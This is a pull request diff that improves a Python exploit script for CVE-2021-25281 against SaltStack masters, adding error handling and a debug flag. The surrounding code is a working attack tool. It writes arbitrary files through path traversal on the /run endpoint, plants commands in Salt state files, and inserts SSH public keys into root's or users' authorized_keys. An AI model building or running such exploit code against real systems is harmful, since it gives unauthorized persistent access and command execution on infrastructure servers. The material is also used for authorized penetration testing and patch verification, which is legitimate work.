### PR TITLE
Added handling of JSONDecodeError and debug messaging

### DIFF
--- a/cve-2021-25281.py
+++ b/cve-2021-25281.py
@@ -22,6 +22,7 @@ from argparse import ArgumentParser, Namespace
 from pathlib import Path
 from secrets import token_hex
 from textwrap import dedent
+from simplejson import JSONDecodeError
 
 import requests
 import urllib3
@@ -38,7 +39,7 @@ def read_file(file_path: Path):
         exit(1)
 
 
-def send_request(url: str, path: str, data: str):
+def send_request(url: str, path: str, data: str, debug=False):
     path = path[1:] if path.startswith('/') else path
     url = f'https://{url}/run' if not url.startswith(('http', 'https')) else f'{url}/run'
     try:
@@ -53,13 +54,20 @@ def send_request(url: str, path: str, data: str):
                 'path': f'../../../../../../{path}',
             },
         )
+
+        if debug:
+            msg = f'\nRequest URL: {response.request.url}\n'
+            msg += f'Request Headers: {response.request.headers}\n'
+            msg += f'Request Body: {response.request.body.decode()}\n\n'
+            msg += f'Response: {response.status_code} {response.reason}\n'
+            print(msg)
+
+        json = response.json()
+        print(f'[+] Got JID: {json["return"][0]["jid"]}, the job was queued successfully')
     except requests.RequestException:
         print(f'[-] Failed to send request to {url}')
         exit(1)
-
-    if json := response.json():
-        print(f'[+] Got JID: {json["return"][0]["jid"]}, the job was queued successfully')
-    else:
+    except JSONDecodeError:
         print('[-] No JID was returned, the request may have failed or the target is not vulnerable')
 
 
@@ -73,7 +81,7 @@ def handle_write_file(args: Namespace):
         exit(1)
 
     print('[+] Attempting to write file')
-    send_request(args.target, args.path, file_contents)
+    send_request(args.target, args.path, file_contents, args.debug)
 
 
 def handle_state_file(args: Namespace):
@@ -84,7 +92,7 @@ def handle_state_file(args: Namespace):
     """)
 
     print(f'[+] Attempting to write command to {state_file_path} state file')
-    send_request(args.target, f'/srv/salt/{state_file_path.name}', file_contents)
+    send_request(args.target, f'/srv/salt/{state_file_path.name}', file_contents, args.debug)
 
 
 def handle_ssh_key(args: Namespace):
@@ -92,14 +100,15 @@ def handle_ssh_key(args: Namespace):
 
     print(f'[+] Attempting to write an authorized key for user {args.user}')
     if args.user == 'root':
-        send_request(args.target, '/root/.ssh/authorized_keys', public_key)
+        send_request(args.target, '/root/.ssh/authorized_keys', public_key, args.debug)
     else:
-        send_request(args.target, f'/home/{args.user}/.ssh/authorized_keys', public_key)
+        send_request(args.target, f'/home/{args.user}/.ssh/authorized_keys', public_key, args.debug)
 
 
 def main():
     parser = ArgumentParser()
     parser.add_argument('target', help='The URL of the target Salt master')
+    parser.add_argument('-v', '--debug', action='store_true', help='Show debug messages')
     subparsers = parser.add_subparsers()
 
     write_parser = subparsers.add_parser('write', help='Write data to a file on the master')


### PR DESCRIPTION
Currently, the script fails when encountering a JSONDecodeError (i.e. when the SaltStack master is down). I've added error handling for that error and also added a verbose command-line argument to print the request URL, headers and body and the response status code & message.